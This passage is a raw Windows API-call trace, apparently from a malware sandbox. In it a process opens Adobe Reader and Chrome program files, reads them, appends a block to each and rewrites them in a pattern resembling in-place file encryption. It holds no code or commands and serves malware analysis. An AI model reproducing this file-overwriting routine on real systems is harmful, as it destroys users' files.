10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1254.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0117.641] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.641] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x25ac [0117.641] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.641] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.641] ReleaseMutex (hMutex=0x168) returned 1 [0117.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1254.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1254.TXT", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP1254.TXT", lpUsedDefaultChar=0x0) returned 10 [0117.642] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.758] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x15ac [0117.758] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.777] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x15ac [0117.777] WriteFile (in: hFile=0x20c, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.778] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0117.778] WriteFile (in: hFile=0x20c, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.778] CloseHandle (hObject=0x20c) returned 1 [0117.778] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp949.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0117.779] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.779] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xc5492 [0117.779] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.779] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.780] ReleaseMutex (hMutex=0x168) returned 1 [0117.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP949.TXT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0117.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP949.TXT", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP949.TXT", lpUsedDefaultChar=0x0) returned 9 [0117.780] ReadFile (in: hFile=0x20c, lpBuffer=0x289f978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0117.792] ReadFile (in: hFile=0x20c, lpBuffer=0x289f978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.815] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xc4492 [0117.815] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea8bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea8bb8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.850] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xc4492 [0117.851] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.851] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0117.851] WriteFile (in: hFile=0x20c, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0117.851] WriteFile (in: hFile=0x20c, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.852] CloseHandle (hObject=0x20c) returned 1 [0117.852] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1034.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1034.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0117.852] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1034.mst", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1034.mst", lpFilePart=0x331f690*="1034.mst") returned 0x64 [0117.852] GetLastError () returned 0x5 [0117.852] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0117.852] LocalFree (hMem=0x69e2b0) returned 0x0 [0117.852] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0117.852] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0117.853] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0117.853] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0117.853] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1034.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1034.mst")) returned 0x21 [0117.854] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1044.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1044.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0117.854] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1044.mst", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1044.mst", lpFilePart=0x331f690*="1044.mst") returned 0x64 [0117.854] GetLastError () returned 0x5 [0117.854] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0117.854] LocalFree (hMem=0x69e2b0) returned 0x0 [0117.854] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0117.854] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0117.854] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0117.854] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0117.854] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1044.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1044.mst")) returned 0x21 [0117.855] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1055.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1055.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0117.855] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1055.mst", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1055.mst", lpFilePart=0x331f690*="1055.mst") returned 0x64 [0117.855] GetLastError () returned 0x5 [0117.855] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0117.855] LocalFree (hMem=0x69e2b0) returned 0x0 [0117.855] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0117.855] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0117.855] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0117.856] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0117.856] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1055.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1055.mst")) returned 0x21 [0117.856] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Setup.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0117.856] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Setup.exe", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Setup.exe", lpFilePart=0x331f690*="Setup.exe") returned 0x65 [0117.856] GetLastError () returned 0x5 [0117.856] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0117.856] LocalFree (hMem=0x69e2b0) returned 0x0 [0117.856] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0117.856] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0117.857] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0117.857] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0117.857] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Setup.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.exe")) returned 0x21 [0117.857] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.exe.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.exe.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0117.858] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.858] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x57f [0117.858] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.858] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.859] ReleaseMutex (hMutex=0x168) returned 1 [0117.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome.exe.sig", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0117.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome.exe.sig", cchWideChar=14, lpMultiByteStr=0x1f7344c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chrome.exe.sig", lpUsedDefaultChar=0x0) returned 14 [0117.859] ReadFile (in: hFile=0x20c, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x57f, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x331f2bc*=0x57f, lpOverlapped=0x0) returned 1 [0117.870] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0117.871] WriteFile (in: hFile=0x20c, lpBuffer=0x2867db8*, nNumberOfBytesToWrite=0xb07, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867db8*, lpNumberOfBytesWritten=0x331f2d0*=0xb07, lpOverlapped=0x0) returned 1 [0117.871] CloseHandle (hObject=0x20c) returned 1 [0117.871] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\youtube.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\youtube.crx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0117.872] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.873] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5c74 [0117.873] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.873] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.873] ReleaseMutex (hMutex=0x168) returned 1 [0117.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="youtube.crx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0117.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="youtube.crx", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="youtube.crx", lpUsedDefaultChar=0x0) returned 11 [0117.873] ReadFile (in: hFile=0x20c, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.880] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4c74 [0117.881] ReadFile (in: hFile=0x20c, lpBuffer=0x2865a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.905] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4c74 [0117.905] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.906] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0117.906] WriteFile (in: hFile=0x20c, lpBuffer=0x1e963d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.906] CloseHandle (hObject=0x20c) returned 1 [0117.907] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bn.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bn.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0117.908] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.908] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa9727 [0117.908] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.908] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.908] ReleaseMutex (hMutex=0x168) returned 1 [0117.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bn.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0117.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bn.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bn.pak", lpUsedDefaultChar=0x0) returned 6 [0117.908] ReadFile (in: hFile=0x20c, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0117.951] ReadFile (in: hFile=0x20c, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.957] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xa8727 [0117.957] ReadFile (in: hFile=0x20c, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.963] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xa8727 [0117.964] WriteFile (in: hFile=0x20c, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.964] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0117.964] WriteFile (in: hFile=0x20c, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0117.965] WriteFile (in: hFile=0x20c, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.965] CloseHandle (hObject=0x20c) returned 1 [0117.965] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es-419.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es-419.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0117.966] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.966] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4fca5 [0117.966] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.967] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.967] ReleaseMutex (hMutex=0x168) returned 1 [0117.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="es-419.pak", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.967] 